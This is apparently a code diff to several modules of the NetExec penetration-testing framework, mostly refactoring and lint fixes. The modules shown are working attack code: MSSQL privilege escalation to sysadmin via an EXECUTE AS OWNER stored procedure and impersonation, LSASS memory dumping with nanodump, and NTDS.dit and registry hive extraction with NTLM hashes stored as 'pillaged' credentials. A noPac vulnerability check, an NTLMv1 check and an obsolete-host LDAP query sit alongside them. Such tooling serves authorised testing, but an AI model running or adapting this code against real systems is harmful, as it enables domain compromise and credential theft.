Executes a series of SQL queries to perform a database owner privilege escalation.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
----
|
||||||
|
database (str): The name of the database to perform the privilege escalation on.
|
||||||
|
exec_as (str, optional): The username to execute the queries as. Defaults to "".
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
-------
|
||||||
|
None
|
||||||
|
"""
|
||||||
self.query_and_get_output(exec_as)
|
self.query_and_get_output(exec_as)
|
||||||
# use database
|
|
||||||
self.query_and_get_output(f"use {database};")
|
self.query_and_get_output(f"use {database};")
|
||||||
query = f"""CREATE PROCEDURE sp_elevate_me
|
|
||||||
|
query = """CREATE PROCEDURE sp_elevate_me
|
||||||
WITH EXECUTE AS OWNER
|
WITH EXECUTE AS OWNER
|
||||||
as
|
as
|
||||||
begin
|
begin
|
||||||
EXEC sp_addsrvrolemember '{self.current_username}','sysadmin'
|
EXEC sp_addsrvrolemember '{self.current_username}','sysadmin'
|
||||||
end"""
|
end"""
|
||||||
self.query_and_get_output(query)
|
self.query_and_get_output(query)
|
||||||
|
|
||||||
self.query_and_get_output("EXEC sp_elevate_me;")
|
self.query_and_get_output("EXEC sp_elevate_me;")
|
||||||
self.query_and_get_output("DROP PROCEDURE sp_elevate_me;")
|
self.query_and_get_output("DROP PROCEDURE sp_elevate_me;")
|
||||||
|
|
||||||
self.revert_context(exec_as)
|
self.revert_context(exec_as)
|
||||||
|
|
||||||
def do_impersonation_privesc(self, username, exec_as=""):
|
def do_impersonation_privesc(self, username, exec_as=""):
|
||||||
|
"""
|
||||||
|
Perform an impersonation privilege escalation by changing the context to the specified user and granting them 'sysadmin' role.
|
||||||
|
|
||||||
|
:param username: The username of the user to escalate privileges for.
|
||||||
|
:type username: str
|
||||||
|
:param exec_as: The username to execute the query as. Defaults to an empty string.
|
||||||
|
:type exec_as: str, optional
|
||||||
|
|
||||||
|
:return: None
|
||||||
|
:rtype: None
|
||||||
|
"""
|
||||||
# change context if necessary
|
# change context if necessary
|
||||||
self.query_and_get_output(exec_as)
|
self.query_and_get_output(exec_as)
|
||||||
# update our privilege
|
# update our privilege
|
||||||
|
@ -264,22 +401,45 @@ class NXCModule:
|
||||||
self.revert_context(exec_as)
|
self.revert_context(exec_as)
|
||||||
|
|
||||||
def get_impersonate_users(self, exec_as="") -> list:
|
def get_impersonate_users(self, exec_as="") -> list:
|
||||||
|
"""
|
||||||
|
Retrieves a list of users who have the permission to impersonate other users.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
----
|
||||||
|
exec_as (str, optional): The context in which the query will be executed. Defaults to "".
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
-------
|
||||||
|
list: A list of user names who have the permission to impersonate other users.
|
||||||
|
"""
|
||||||
query = """SELECT DISTINCT b.name
|
query = """SELECT DISTINCT b.name
|
||||||
FROM sys.server_permissions a
|
FROM sys.server_permissions a
|
||||||
INNER JOIN sys.server_principals b
|
INNER JOIN sys.server_principals b
|
||||||
ON a.grantor_principal_id = b.principal_id
|
ON a.grantor_principal_id = b.principal_id
|
||||||
WHERE a.permission_name like 'IMPERSONATE%'"""
|
WHERE a.permission_name like 'IMPERSONATE%'"""
|
||||||
res = self.query_and_get_output(exec_as + query)
|
res = self.query_and_get_output(exec_as + query)
|
||||||
# self.context.log.debug(f"Result: {res}")
|
|
||||||
self.revert_context(exec_as)
|
self.revert_context(exec_as)
|
||||||
users = [user["name"] for user in res]
|
return [user["name"] for user in res]
|
||||||
return users
|
|
||||||
|
|
||||||
def remove_sysadmin_priv(self) -> bool:
|
def remove_sysadmin_priv(self) -> bool:
|
||||||
res = self.query_and_get_output(f"EXEC sp_dropsrvrolemember '{self.current_username}', 'sysadmin'")
|
"""
|
||||||
|
Remove the sysadmin privilege from the current user.
|
||||||
|
|
||||||
|
:return: True if the sysadmin privilege was successfully removed, False otherwise.
|
||||||
|
:rtype: bool
|
||||||
|
"""
|
||||||
|
self.query_and_get_output(f"EXEC sp_dropsrvrolemember '{self.current_username}', 'sysadmin'")
|
||||||
return not self.is_admin()
|
return not self.is_admin()
|
||||||
|
|
||||||
def is_admin_user(self, username) -> bool:
|
def is_admin_user(self, username) -> bool:
|
||||||
|
"""
|
||||||
|
Check if the given username belongs to an admin user.
|
||||||
|
|
||||||
|
:param username: The username to check.
|
||||||
|
:type username: str
|
||||||
|
:return: True if the username belongs to an admin user, False otherwise.
|
||||||
|
:rtype: bool
|
||||||
|
"""
|
||||||
res = self.query_and_get_output(f"SELECT IS_SRVROLEMEMBER('sysadmin', '{username}')")
|
res = self.query_and_get_output(f"SELECT IS_SRVROLEMEMBER('sysadmin', '{username}')")
|
||||||
try:
|
try:
|
||||||
if int(res):
|
if int(res):
|
||||||
|
@ -287,8 +447,19 @@ class NXCModule:
|
||||||
return True
|
return True
|
||||||
else:
|
else:
|
||||||
return False
|
return False
|
||||||
except:
|
except Exception:
|
||||||
return False
|
return False
|
||||||
|
|
||||||
def revert_context(self, exec_as):
|
def revert_context(self, exec_as):
|
||||||
|
"""
|
||||||
|
Reverts the context for the specified user.
|
||||||
|
|
||||||
|
Parameters
|
||||||
|
----------
|
||||||
|
exec_as (str): The user for whom the context should be reverted.
|
||||||
|
|
||||||
|
Returns
|
||||||
|
-------
|
||||||
|
None
|
||||||
|
"""
|
||||||
self.query_and_get_output("REVERT;" * exec_as.count("EXECUTE"))
|
self.query_and_get_output("REVERT;" * exec_as.count("EXECUTE"))
|
||||||
|
|
|
@ -1,5 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
# nanodump module for nxc python3
|
# nanodump module for nxc python3
|
||||||
# author of the module : github.com/mpgn
|
# author of the module : github.com/mpgn
|
||||||
# nanodump: https://github.com/helpsystems/nanodump
|
# nanodump: https://github.com/helpsystems/nanodump
|
||||||
|
@ -35,7 +33,7 @@ class NXCModule:
|
||||||
self.module_options = module_options
|
self.module_options = module_options
|
||||||
|
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
"""
|
r"""
|
||||||
TMP_DIR Path where process dump should be saved on target system (default: C:\\Windows\\Temp\\)
|
TMP_DIR Path where process dump should be saved on target system (default: C:\\Windows\\Temp\\)
|
||||||
NANO_PATH Path where nano.exe is on your system (default: OS temp directory)
|
NANO_PATH Path where nano.exe is on your system (default: OS temp directory)
|
||||||
NANO_EXE_NAME Name of the nano executable (default: nano.exe)
|
NANO_EXE_NAME Name of the nano executable (default: nano.exe)
|
||||||
|
@ -100,7 +98,7 @@ class NXCModule:
|
||||||
with open(os.path.join(self.nano_path, self.nano), "rb") as nano:
|
with open(os.path.join(self.nano_path, self.nano), "rb") as nano:
|
||||||
try:
|
try:
|
||||||
self.context.log.display(f"Copy {self.nano} to {self.remote_tmp_dir}")
|
self.context.log.display(f"Copy {self.nano} to {self.remote_tmp_dir}")
|
||||||
exec_method = MSSQLEXEC(self.connection.conn)
|
exec_method = MSSQLEXEC(self.connection.conn, self.context.log)
|
||||||
exec_method.put_file(nano.read(), self.remote_tmp_dir + self.nano)
|
exec_method.put_file(nano.read(), self.remote_tmp_dir + self.nano)
|
||||||
if exec_method.file_exists(self.remote_tmp_dir + self.nano):
|
if exec_method.file_exists(self.remote_tmp_dir + self.nano):
|
||||||
self.context.log.success(f"Created file {self.nano} on the remote machine {self.remote_tmp_dir}")
|
self.context.log.success(f"Created file {self.nano} on the remote machine {self.remote_tmp_dir}")
|
||||||
|
@ -113,20 +111,20 @@ class NXCModule:
|
||||||
# apparently SMB exec methods treat the output parameter differently than MSSQL (we use it to display())
|
# apparently SMB exec methods treat the output parameter differently than MSSQL (we use it to display())
|
||||||
# if we don't do this, then SMB doesn't actually return the results of commands, so it appears that the
|
# if we don't do this, then SMB doesn't actually return the results of commands, so it appears that the
|
||||||
# execution fails, which it doesn't
|
# execution fails, which it doesn't
|
||||||
display_output = True if self.context.protocol == "smb" else False
|
display_output = self.context.protocol == "smb"
|
||||||
self.context.log.debug(f"Display Output: {display_output}")
|
self.context.log.debug(f"Display Output: {display_output}")
|
||||||
# get LSASS PID via `tasklist`
|
# get LSASS PID via `tasklist`
|
||||||
command = 'tasklist /v /fo csv | findstr /i "lsass"'
|
command = 'tasklist /v /fo csv | findstr /i "lsass"'
|
||||||
self.context.log.display(f"Getting LSASS PID via command {command}")
|
self.context.log.display(f"Getting LSASS PID via command {command}")
|
||||||
p = self.connection.execute(command, display_output)
|
p = self.connection.execute(command, display_output)
|
||||||
self.context.log.debug(f"tasklist Command Result: {p}")
|
self.context.log.debug(f"tasklist Command Result: {p}")
|
||||||
|
if not p or p == "None":
|
||||||
|
self.context.log.fail("Failed to execute command to get LSASS PID")
|
||||||
|
return
|
||||||
|
|
||||||
if len(p) == 1:
|
if len(p) == 1:
|
||||||
p = p[0]
|
p = p[0]
|
||||||
|
|
||||||
if not p or p == "None":
|
|
||||||
self.context.log.fail(f"Failed to execute command to get LSASS PID")
|
|
||||||
return
|
|
||||||
|
|
||||||
pid = p.split(",")[1][1:-1]
|
pid = p.split(",")[1][1:-1]
|
||||||
self.context.log.debug(f"pid: {pid}")
|
self.context.log.debug(f"pid: {pid}")
|
||||||
timestamp = datetime.today().strftime("%Y%m%d_%H%M")
|
timestamp = datetime.today().strftime("%Y%m%d_%H%M")
|
||||||
|
@ -138,7 +136,7 @@ class NXCModule:
|
||||||
self.context.log.debug(f"NanoDump Command Result: {p}")
|
self.context.log.debug(f"NanoDump Command Result: {p}")
|
||||||
|
|
||||||
if not p or p == "None":
|
if not p or p == "None":
|
||||||
self.context.log.fail(f"Failed to execute command to execute NanoDump")
|
self.context.log.fail("Failed to execute command to execute NanoDump")
|
||||||
self.delete_nanodump_binary()
|
self.delete_nanodump_binary()
|
||||||
return
|
return
|
||||||
|
|
||||||
|
@ -154,7 +152,7 @@ class NXCModule:
|
||||||
|
|
||||||
if dump:
|
if dump:
|
||||||
self.context.log.display(f"Copying {nano_log_name} to host")
|
self.context.log.display(f"Copying {nano_log_name} to host")
|
||||||
filename = os.path.join(self.dir_result,f"{self.connection.hostname}_{self.connection.os_arch}_{self.connection.domain}.log")
|
filename = os.path.join(self.dir_result, f"{self.connection.hostname}_{self.connection.os_arch}_{self.connection.domain}.log")
|
||||||
if self.context.protocol == "smb":
|
if self.context.protocol == "smb":
|
||||||
with open(filename, "wb+") as dump_file:
|
with open(filename, "wb+") as dump_file:
|
||||||
try:
|
try:
|
||||||
|
@ -190,14 +188,13 @@ class NXCModule:
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
self.context.log.fail(f"[OPSEC] Error deleting lsass.dmp file on dir {self.remote_tmp_dir}: {e}")
|
self.context.log.fail(f"[OPSEC] Error deleting lsass.dmp file on dir {self.remote_tmp_dir}: {e}")
|
||||||
|
|
||||||
fh = open(filename, "r+b")
|
with open(filename, "r+b") as fh: # needs the "r+b", not "rb" like below
|
||||||
fh.seek(0)
|
fh.seek(0)
|
||||||
fh.write(b"\x4d\x44\x4d\x50")
|
fh.write(b"\x4d\x44\x4d\x50")
|
||||||
fh.seek(4)
|
fh.seek(4)
|
||||||
fh.write(b"\xa7\x93")
|
fh.write(b"\xa7\x93")
|
||||||
fh.seek(6)
|
fh.seek(6)
|
||||||
fh.write(b"\x00\x00")
|
fh.write(b"\x00\x00")
|
||||||
fh.close()
|
|
||||||
|
|
||||||
with open(filename, "rb") as dump:
|
with open(filename, "rb") as dump:
|
||||||
try:
|
try:
|
||||||
|
|
|
@ -1,5 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
# Credit to https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html
|
# Credit to https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html
|
||||||
# @exploitph @Evi1cg
|
# @exploitph @Evi1cg
|
||||||
# module by @mpgn_x64
|
# module by @mpgn_x64
|
||||||
|
@ -49,5 +47,5 @@ class NXCModule:
|
||||||
context.log.highlight("")
|
context.log.highlight("")
|
||||||
context.log.highlight("VULNERABLE")
|
context.log.highlight("VULNERABLE")
|
||||||
context.log.highlight("Next step: https://github.com/Ridter/noPac")
|
context.log.highlight("Next step: https://github.com/Ridter/noPac")
|
||||||
except OSError as e:
|
except OSError:
|
||||||
context.log.debug(f"Error connecting to Kerberos (port 88) on {connection.host}")
|
context.log.debug(f"Error connecting to Kerberos (port 88) on {connection.host}")
|
||||||
|
|
|
@ -41,14 +41,14 @@ class NXCModule:
|
||||||
self.no_delete = True
|
self.no_delete = True
|
||||||
|
|
||||||
def on_admin_login(self, context, connection):
|
def on_admin_login(self, context, connection):
|
||||||
command = "powershell \"ntdsutil.exe 'ac i ntds' 'ifm' 'create full %s%s' q q\"" % (self.tmp_dir, self.dump_location)
|
command = f"powershell \"ntdsutil.exe 'ac i ntds' 'ifm' 'create full {self.tmp_dir}{self.dump_location}' q q\""
|
||||||
context.log.display("Dumping ntds with ntdsutil.exe to %s%s" % (self.tmp_dir, self.dump_location))
|
context.log.display(f"Dumping ntds with ntdsutil.exe to {self.tmp_dir}{self.dump_location}")
|
||||||
context.log.highlight("Dumping the NTDS, this could take a while so go grab a redbull...")
|
context.log.highlight("Dumping the NTDS, this could take a while so go grab a redbull...")
|
||||||
context.log.debug("Executing command {}".format(command))
|
context.log.debug(f"Executing command {command}")
|
||||||
p = connection.execute(command, True)
|
p = connection.execute(command, True)
|
||||||
context.log.debug(p)
|
context.log.debug(p)
|
||||||
if "success" in p:
|
if "success" in p:
|
||||||
context.log.success("NTDS.dit dumped to %s%s" % (self.tmp_dir, self.dump_location))
|
context.log.success(f"NTDS.dit dumped to {self.tmp_dir}{self.dump_location}")
|
||||||
else:
|
else:
|
||||||
context.log.fail("Error while dumping NTDS")
|
context.log.fail("Error while dumping NTDS")
|
||||||
return
|
return
|
||||||
|
@ -57,53 +57,56 @@ class NXCModule:
|
||||||
os.makedirs(os.path.join(self.dir_result, "Active Directory"), exist_ok=True)
|
os.makedirs(os.path.join(self.dir_result, "Active Directory"), exist_ok=True)
|
||||||
os.makedirs(os.path.join(self.dir_result, "registry"), exist_ok=True)
|
os.makedirs(os.path.join(self.dir_result, "registry"), exist_ok=True)
|
||||||
|
|
||||||
context.log.display("Copying NTDS dump to %s" % self.dir_result)
|
context.log.display(f"Copying NTDS dump to {self.dir_result}")
|
||||||
|
|
||||||
context.log.debug("Copy ntds.dit to host")
|
context.log.debug("Copy ntds.dit to host")
|
||||||
with open(os.path.join(self.dir_result, "Active Directory", "ntds.dit"), "wb+") as dump_file:
|
with open(os.path.join(self.dir_result, "Active Directory", "ntds.dit"), "wb+") as dump_file:
|
||||||
try:
|
try:
|
||||||
connection.conn.getFile(
|
connection.conn.getFile(
|
||||||
self.share,
|
self.share,
|
||||||
self.tmp_share + self.dump_location + "\\" + "Active Directory\\ntds.dit",
|
f"{self.tmp_share}{self.dump_location}\\Active Directory\\ntds.dit",
|
||||||
dump_file.write,
|
dump_file.write,
|
||||||
)
|
)
|
||||||
context.log.debug("Copied ntds.dit file")
|
context.log.debug("Copied ntds.dit file")
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.fail("Error while get ntds.dit file: {}".format(e))
|
context.log.fail(f"Error while get ntds.dit file: {e}")
|
||||||
|
|
||||||
context.log.debug("Copy SYSTEM to host")
|
context.log.debug("Copy SYSTEM to host")
|
||||||
with open(os.path.join(self.dir_result, "registry", "SYSTEM"), "wb+") as dump_file:
|
with open(os.path.join(self.dir_result, "registry", "SYSTEM"), "wb+") as dump_file:
|
||||||
try:
|
try:
|
||||||
connection.conn.getFile(
|
connection.conn.getFile(
|
||||||
self.share,
|
self.share,
|
||||||
self.tmp_share + self.dump_location + "\\" + "registry\\SYSTEM",
|
f"{self.tmp_share}{self.dump_location}\\registry\\SYSTEM",
|
||||||
dump_file.write,
|
dump_file.write,
|
||||||
)
|
)
|
||||||
context.log.debug("Copied SYSTEM file")
|
context.log.debug("Copied SYSTEM file")
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.fail("Error while get SYSTEM file: {}".format(e))
|
context.log.fail(f"Error while get SYSTEM file: {e}")
|
||||||
|
|
||||||
context.log.debug("Copy SECURITY to host")
|
context.log.debug("Copy SECURITY to host")
|
||||||
with open(os.path.join(self.dir_result, "registry", "SECURITY"), "wb+") as dump_file:
|
with open(os.path.join(self.dir_result, "registry", "SECURITY"), "wb+") as dump_file:
|
||||||
try:
|
try:
|
||||||
connection.conn.getFile(
|
connection.conn.getFile(
|
||||||
self.share,
|
self.share,
|
||||||
self.tmp_share + self.dump_location + "\\" + "registry\\SECURITY",
|
f"{self.tmp_share}{self.dump_location}\\registry\\SECURITY",
|
||||||
dump_file.write,
|
dump_file.write,
|
||||||
)
|
)
|
||||||
context.log.debug("Copied SECURITY file")
|
context.log.debug("Copied SECURITY file")
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.fail("Error while get SECURITY file: {}".format(e))
|
context.log.fail(f"Error while get SECURITY file: {e}")
|
||||||
context.log.display("NTDS dump copied to %s" % self.dir_result)
|
|
||||||
try:
|
|
||||||
command = "rmdir /s /q %s%s" % (self.tmp_dir, self.dump_location)
|
|
||||||
p = connection.execute(command, True)
|
|
||||||
context.log.success("Deleted %s%s remote dump directory" % (self.tmp_dir, self.dump_location))
|
|
||||||
except Exception as e:
|
|
||||||
context.log.fail("Error deleting {} remote directory on share {}: {}".format(self.dump_location, self.share, e))
|
|
||||||
|
|
||||||
localOperations = LocalOperations("%s/registry/SYSTEM" % self.dir_result)
|
context.log.display(f"NTDS dump copied to {self.dir_result}")
|
||||||
bootKey = localOperations.getBootKey()
|
|
||||||
noLMHash = localOperations.checkNoLMHashPolicy()
|
try:
|
||||||
|
command = f"rmdir /s /q {self.tmp_dir}{self.dump_location}"
|
||||||
|
p = connection.execute(command, True)
|
||||||
|
context.log.success(f"Deleted {self.tmp_dir}{self.dump_location} remote dump directory")
|
||||||
|
except Exception as e:
|
||||||
|
context.log.fail(f"Error deleting {self.dump_location} remote directory on share {self.share}: {e}")
|
||||||
|
|
||||||
|
local_operations = LocalOperations(f"{self.dir_result}/registry/SYSTEM")
|
||||||
|
boot_key = local_operations.getBootKey()
|
||||||
|
no_lm_hash = local_operations.checkNoLMHashPolicy()
|
||||||
|
|
||||||
host_id = context.db.get_hosts(filter_term=connection.host)[0][0]
|
host_id = context.db.get_hosts(filter_term=connection.host)[0][0]
|
||||||
|
|
||||||
|
@ -118,20 +121,20 @@ class NXCModule:
|
||||||
context.log.highlight(ntds_hash)
|
context.log.highlight(ntds_hash)
|
||||||
if ntds_hash.find("$") == -1:
|
if ntds_hash.find("$") == -1:
|
||||||
if ntds_hash.find("\\") != -1:
|
if ntds_hash.find("\\") != -1:
|
||||||
domain, hash = ntds_hash.split("\\")
|
domain, clean_hash = ntds_hash.split("\\")
|
||||||
else:
|
else:
|
||||||
domain = connection.domain
|
domain = connection.domain
|
||||||
hash = ntds_hash
|
clean_hash = ntds_hash
|
||||||
|
|
||||||
try:
|
try:
|
||||||
username, _, lmhash, nthash, _, _, _ = hash.split(":")
|
username, _, lmhash, nthash, _, _, _ = clean_hash.split(":")
|
||||||
parsed_hash = ":".join((lmhash, nthash))
|
parsed_hash = f"{lmhash}:{nthash}"
|
||||||
if validate_ntlm(parsed_hash):
|
if validate_ntlm(parsed_hash):
|
||||||
context.db.add_credential("hash", domain, username, parsed_hash, pillaged_from=host_id)
|
context.db.add_credential("hash", domain, username, parsed_hash, pillaged_from=host_id)
|
||||||
add_ntds_hash.added_to_db += 1
|
add_ntds_hash.added_to_db += 1
|
||||||
return
|
return
|
||||||
raise
|
raise
|
||||||
except:
|
except Exception:
|
||||||
context.log.debug("Dumped hash is not NTLM, not adding to db for now ;)")
|
context.log.debug("Dumped hash is not NTLM, not adding to db for now ;)")
|
||||||
else:
|
else:
|
||||||
context.log.debug("Dumped hash is a computer account, not adding to db")
|
context.log.debug("Dumped hash is a computer account, not adding to db")
|
||||||
|
@ -140,11 +143,11 @@ class NXCModule:
|
||||||
add_ntds_hash.added_to_db = 0
|
add_ntds_hash.added_to_db = 0
|
||||||
|
|
||||||
NTDS = NTDSHashes(
|
NTDS = NTDSHashes(
|
||||||
"%s/Active Directory/ntds.dit" % self.dir_result,
|
f"{self.dir_result}/Active Directory/ntds.dit",
|
||||||
bootKey,
|
boot_key,
|
||||||
isRemote=False,
|
isRemote=False,
|
||||||
history=False,
|
history=False,
|
||||||
noLMHash=noLMHash,
|
noLMHash=no_lm_hash,
|
||||||
remoteOps=None,
|
remoteOps=None,
|
||||||
useVSSMethod=True,
|
useVSSMethod=True,
|
||||||
justNTLM=True,
|
justNTLM=True,
|
||||||
|
@ -159,22 +162,17 @@ class NXCModule:
|
||||||
try:
|
try:
|
||||||
context.log.success("Dumping the NTDS, this could take a while so go grab a redbull...")
|
context.log.success("Dumping the NTDS, this could take a while so go grab a redbull...")
|
||||||
NTDS.dump()
|
NTDS.dump()
|
||||||
context.log.success(
|
context.log.success(f"Dumped {highlight(add_ntds_hash.ntds_hashes)} NTDS hashes to {connection.output_filename}.ntds of which {highlight(add_ntds_hash.added_to_db)} were added to the database")
|
||||||
"Dumped {} NTDS hashes to {} of which {} were added to the database".format(
|
|
||||||
highlight(add_ntds_hash.ntds_hashes),
|
|
||||||
connection.output_filename + ".ntds",
|
|
||||||
highlight(add_ntds_hash.added_to_db),
|
|
||||||
)
|
|
||||||
)
|
|
||||||
context.log.display("To extract only enabled accounts from the output file, run the following command: ")
|
context.log.display("To extract only enabled accounts from the output file, run the following command: ")
|
||||||
context.log.display("grep -iv disabled {} | cut -d ':' -f1".format(connection.output_filename + ".ntds"))
|
context.log.display(f"grep -iv disabled {connection.output_filename}.ntds | cut -d ':' -f1")
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.fail(e)
|
context.log.fail(e)
|
||||||
|
|
||||||
NTDS.finish()
|
NTDS.finish()
|
||||||
|
|
||||||
if self.no_delete:
|
if self.no_delete:
|
||||||
context.log.display("Raw NTDS dump copied to %s, parse it with:" % self.dir_result)
|
context.log.display(f"Raw NTDS dump copied to {self.dir_result}, parse it with:")
|
||||||
context.log.display('secretsdump.py -system %s/registry/SYSTEM -security %s/registry/SECURITY -ntds "%s/Active Directory/ntds.dit" LOCAL' % (self.dir_result, self.dir_result, self.dir_result))
|
context.log.display(f"secretsdump.py -system '{self.dir_result}/registry/SYSTEM' -security '{self.dir_result}/registry/SECURITY' -ntds '{self.dir_result}/Active Directory/ntds.dit' LOCAL")
|
||||||
else:
|
else:
|
||||||
shutil.rmtree(self.dir_result)
|
shutil.rmtree(self.dir_result)
|
||||||
|
|
|
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
from impacket.dcerpc.v5 import rrp
|
from impacket.dcerpc.v5 import rrp
|
||||||
from impacket.examples.secretsdump import RemoteOperations
|
from impacket.examples.secretsdump import RemoteOperations
|
||||||
from impacket.dcerpc.v5.rrp import DCERPCSessionError
|
from impacket.dcerpc.v5.rrp import DCERPCSessionError
|
||||||
|
@ -10,10 +7,11 @@ class NXCModule:
|
||||||
"""
|
"""
|
||||||
Detect if the target's LmCompatibilityLevel will allow NTLMv1 authentication
|
Detect if the target's LmCompatibilityLevel will allow NTLMv1 authentication
|
||||||
Module by @Tw1sm
|
Module by @Tw1sm
|
||||||
|
Modified by Deft (08/02/2024)
|
||||||
"""
|
"""
|
||||||
|
|
||||||
name = "ntlmv1"
|
name = "ntlmv1"
|
||||||
description = "Detect if lmcompatibilitylevel on the target is set to 0 or 1"
|
description = "Detect if lmcompatibilitylevel on the target is set to lower than 3 (which means ntlmv1 is enabled)"
|
||||||
supported_protocols = ["smb"]
|
supported_protocols = ["smb"]
|
||||||
opsec_safe = True
|
opsec_safe = True
|
||||||
multiple_hosts = True
|
multiple_hosts = True
|
||||||
|
@ -35,19 +33,22 @@ class NXCModule:
|
||||||
"SYSTEM\\CurrentControlSet\\Control\\Lsa",
|
"SYSTEM\\CurrentControlSet\\Control\\Lsa",
|
||||||
)
|
)
|
||||||
key_handle = ans["phkResult"]
|
key_handle = ans["phkResult"]
|
||||||
rtype = None
|
rtype = data = None
|
||||||
data = None
|
|
||||||
try:
|
try:
|
||||||
rtype, data = rrp.hBaseRegQueryValue(
|
rtype, data = rrp.hBaseRegQueryValue(
|
||||||
remote_ops._RemoteOperations__rrp,
|
remote_ops._RemoteOperations__rrp,
|
||||||
key_handle,
|
key_handle,
|
||||||
"lmcompatibilitylevel\x00",
|
"lmcompatibilitylevel\x00",
|
||||||
)
|
)
|
||||||
except rrp.DCERPCSessionError as e:
|
|
||||||
context.log.debug(f"Unable to reference lmcompatabilitylevel, which probably means ntlmv1 is not set")
|
|
||||||
|
|
||||||
if rtype and data and int(data) in [0, 1, 2]:
|
except rrp.DCERPCSessionError:
|
||||||
|
context.log.debug("Unable to reference lmcompatabilitylevel, which probably means ntlmv1 is not set")
|
||||||
|
|
||||||
|
# Changed by Defte
|
||||||
|
# Unless this keys is set to 3 or higher, NTLMv1 can be used
|
||||||
|
if data in [0, 1, 2]:
|
||||||
context.log.highlight(self.output.format(connection.conn.getRemoteHost(), data))
|
context.log.highlight(self.output.format(connection.conn.getRemoteHost(), data))
|
||||||
|
|
||||||
except DCERPCSessionError as e:
|
except DCERPCSessionError as e:
|
||||||
context.log.debug(f"Error connecting to RemoteRegistry: {e}")
|
context.log.debug(f"Error connecting to RemoteRegistry: {e}")
|
||||||
finally:
|
finally:
|
||||||
|
|
|
@ -0,0 +1,84 @@
|
||||||
|
#!/usr/bin/env python3
|
||||||
|
|
||||||
|
from datetime import datetime, timedelta
|
||||||
|
from nxc.paths import NXC_PATH
|
||||||
|
import socket
|
||||||
|
|
||||||
|
|
||||||
|
class NXCModule:
|
||||||
|
"""
|
||||||
|
Extract obsolete operating systems from LDAP
|
||||||
|
Module by Brandon Fisher @shad0wcntr0ller
|
||||||
|
"""
|
||||||
|
name = "obsolete"
|
||||||
|
description = "Extract all obsolete operating systems from LDAP"
|
||||||
|
supported_protocols = ["ldap"]
|
||||||
|
opsec_safe = True
|
||||||
|
multiple_hosts = True
|
||||||
|
|
||||||
|
def ldap_time_to_datetime(self, ldap_time):
|
||||||
|
"""Convert an LDAP timestamp to a datetime object."""
|
||||||
|
if ldap_time == "0": # Account for never-set passwords
|
||||||
|
return "Never"
|
||||||
|
try:
|
||||||
|
epoch = datetime(1601, 1, 1) + timedelta(seconds=int(ldap_time) / 10000000)
|
||||||
|
return epoch.strftime("%Y-%m-%d %H:%M:%S")
|
||||||
|
except Exception:
|
||||||
|
return "Conversion Error"
|
||||||
|
|
||||||
|
def options(self, context, module_options):
|
||||||
|
"""No module-specific options required."""
|
||||||
|
|
||||||
|
def on_login(self, context, connection):
|
||||||
|
search_filter = ("(&(objectclass=computer)(!(userAccountControl:1.2.840.113556.1.4.803:=2))"
|
||||||
|
"(|(operatingSystem=*Windows 6*)(operatingSystem=*Windows 2000*)"
|
||||||
|
"(operatingSystem=*Windows XP*)(operatingSystem=*Windows Vista*)"
|
||||||
|
"(operatingSystem=*Windows 7*)(operatingSystem=*Windows 8*)"
|
||||||
|
"(operatingSystem=*Windows 8.1*)(operatingSystem=*Windows Server 2003*)"
|
||||||
|
"(operatingSystem=*Windows Server 2008*)(operatingSystem=*Windows Server 2012*)))")
|
||||||
|
attributes = ["name", "operatingSystem", "dNSHostName", "pwdLastSet"]
|
||||||
|
|
||||||
|
try:
|
||||||
|
context.log.debug(f"Search Filter={search_filter}")
|
||||||
|
resp = connection.ldapConnection.search(searchFilter=search_filter, attributes=attributes, sizeLimit=0)
|
||||||
|
except Exception:
|
||||||
|
context.log.error("LDAP search error:", exc_info=True)
|
||||||
|
return False
|
||||||
|
|
||||||
|
answers = []
|
||||||
|
context.log.debug(f"Total of records returned {len(resp)}")
|
||||||
|
|
||||||
|
for item in resp:
|
||||||
|
if "attributes" not in item:
|
||||||
|
continue
|
||||||
|
dns_hostname, pwd_last_set = "", "0" # Default '0' for pwdLastSet
|
||||||
|
for attribute in item["attributes"]:
|
||||||
|
attr_type = str(attribute["type"])
|
||||||
|
if attr_type == "operatingSystem":
|
||||||
|
os = str(attribute["vals"][0])
|
||||||
|
elif attr_type == "dNSHostName":
|
||||||
|
dns_hostname = str(attribute["vals"][0])
|
||||||
|
elif attr_type == "pwdLastSet":
|
||||||
|
pwd_last_set = str(attribute["vals"][0])
|
||||||
|
|
||||||
|
if dns_hostname and os:
|
||||||
|
pwd_last_set_readable = self.ldap_time_to_datetime(pwd_last_set)
|
||||||
|
try:
|
||||||
|
ip_address = socket.gethostbyname(dns_hostname)
|
||||||
|
answers.append((dns_hostname, ip_address, os, pwd_last_set_readable))
|
||||||
|
except socket.gaierror:
|
||||||
|
answers.append((dns_hostname, "N/A", os, pwd_last_set_readable))
|
||||||
|
|
||||||
|
if answers:
|
||||||
|
obsolete_hosts_count = len(answers)
|
||||||
|
filename = f"{NXC_PATH}/logs/{connection.domain}.obsoletehosts.txt"
|
||||||
|
context.log.display(f"{obsolete_hosts_count} Obsolete hosts will be saved to {filename}")
|
||||||
|
with open(filename, "w") as f:
|
||||||
|
for dns_hostname, ip_address, os, pwd_last_set_readable in answers:
|
||||||
|
log_message = f"{dns_hostname} ({ip_address}) : {os} [pwd-last-set: {pwd_last_set_readable}]"
|
||||||
|
context.log.highlight(log_message)
|
||||||
|
f.write(log_message + "\n")
|
||||||
|
else:
|
||||||
|
context.log.display("No Obsolete Hosts Identified")
|
||||||
|
|
||||||
|
return True
|
|
@ -1,5 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
